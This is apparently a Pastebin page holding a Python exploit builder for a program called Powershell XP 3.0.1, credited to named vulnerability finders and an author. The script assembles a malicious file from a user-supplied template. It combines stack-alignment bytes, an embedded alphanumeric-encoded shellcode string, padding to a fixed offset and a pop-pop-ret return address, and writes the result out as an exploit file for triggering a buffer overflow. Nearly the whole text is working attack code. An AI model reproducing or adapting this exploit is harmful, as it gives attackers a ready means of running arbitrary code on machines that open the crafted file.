SHARE
TWEET

Powershell XP 3.0.1 Exploit

a guest Dec 12th, 2010 139 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/python
  2.  
  3. # vuln finders : kmkz, zadyree, hellpast
  4. # author       : m_101
  5. # site         : binholic.blogspot.com
  6.  
  7. import sys
  8.  
  9. if len(sys.argv) < 4:
  10.     print("Usage: %s input output payload" % sys.argv[0])
  11.     exit(1)
  12.  
  13. # get file content
  14. infile = sys.argv[1]
  15. fp = open(infile, 'r')
  16. content = fp.read()
  17. fp.close()
  18.  
  19. #
  20. fpayload = sys.argv[3]
  21. fp = open(fpayload, 'r')
  22. payload = fp.read()
  23. fp.close()
  24.  
  25. # first offset ... but not enough room
  26. # ret_offset = 248
  27. ret_offset = 5268
  28.  
  29. # pop pop ret
  30. ret = "\x9e\x13\x40\x00"
  31.  
  32. ecx = "\x45\x61\x39\x76"
  33. eax = "\x47\x61\x39\x76"
  34.  
  35. print("Constructing alignment code")
  36. # alignment code
  37. # dec esp
  38. # dec esp
  39. # dec esp
  40. # dec esp
  41. align = 'L' * 4
  42. # push esp  ; save current esp register
  43. align += 'T'
  44. # pop edx   ; save in edx
  45. align += 'Z'
  46. # pop esp (make esp point to data)
  47. align += '\\'
  48. # push edx  ; old esp register
  49. align += 'R'    # edi
  50. # popad
  51. align += 'a'
  52.  
  53. # align += ecx
  54. # align += eax
  55.  
  56. # we get actual value (for later restore ;))
  57. # pop ecx
  58. # push ecx
  59. align += "\x59\x51"
  60. # push esp
  61. # pop eax       ; here the code is adjusted but we still need to restore old stack
  62. align += 'TX'
  63. # we repatch the stack (or we may have bad memory access ;))
  64. # push ecx
  65. align += "\x51"
  66. # we don't want our current instructions to be crushed
  67. # dec esp * 4
  68. align += 'L' * 8
  69. # push edi  ; old stack
  70. align += 'W'
  71. # pop esp   ; restore old stack
  72. align += '\\'
  73. # junk bytes
  74. align += 'K' * 4 # scrape space (esp point here)
  75.  
  76. # buffer need to be long enough ;)
  77. print("Padding")
  78.  
  79. print("Constructing payload")
  80. msg = "PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIhkS62xKYc5wpC0uP9xZUKOkOyonahlwP5PEPuPK9kUOySuc8kXf6Gp5Ps0Phnn0NdNzLPPm81yS05Ps0NiQUuPLKsmEXmQO38WePEP5PPSYoPUuPsXMxOR2mMlPPKXrnePgpwpOyG5Vd0h5P7p5PuPLKCm38mQksJB5PC05PpSLKSmS8NaiSJMgpgpwpQCSXwpuPS0GpKOpUTDlKBedHmks9uRWp5PvazxioKP01O0PdUS3ptp1hvlLKQPTLnkRPglnMNkcpS8XkUYNk1PttnmCpsLnksp7LySQpnkbLddQ4lKPE5lLKrtuUrX5Q8jLK3zTXNkQJ5peQXkysvWSyNkP4LKuQXnTq9otqyPKLNLMTKp444JyQXOTMWqKwyyIaKOKOKOwKcL145x45YNLK3jTdeQ8kCVNkflbkNk0ZULs18klKuTLKgqKXLIW4VDglE1hBUXWpt5cC1uBRUcGBfN2DPl0lWpaXpa2C2K3UpdTaup7JUyuPPPu1RWPnQuPdupsRaiUpBMcotqtpvQWpA"
  81. payload = msg + payload
  82. print("Payload size : %u" % len(payload))
  83. # let's have the minimum correct buffer length!
  84. padding = (ret_offset - len(payload) - len(align)) * 'C'
  85.  
  86. print("Constructing egg")
  87. egg = align + payload + padding + ret
  88. print("Egg size : %u" % len(egg))
  89.  
  90. modified = content.replace('TESTTEST', egg)
  91.  
  92. # working
  93. outfile = sys.argv[2]
  94. print ("Writing exploit file : %s" % outfile)
  95. fp = open(outfile, 'w')
  96. fp.write(modified)
  97. fp.close()
RAW Paste Data
Top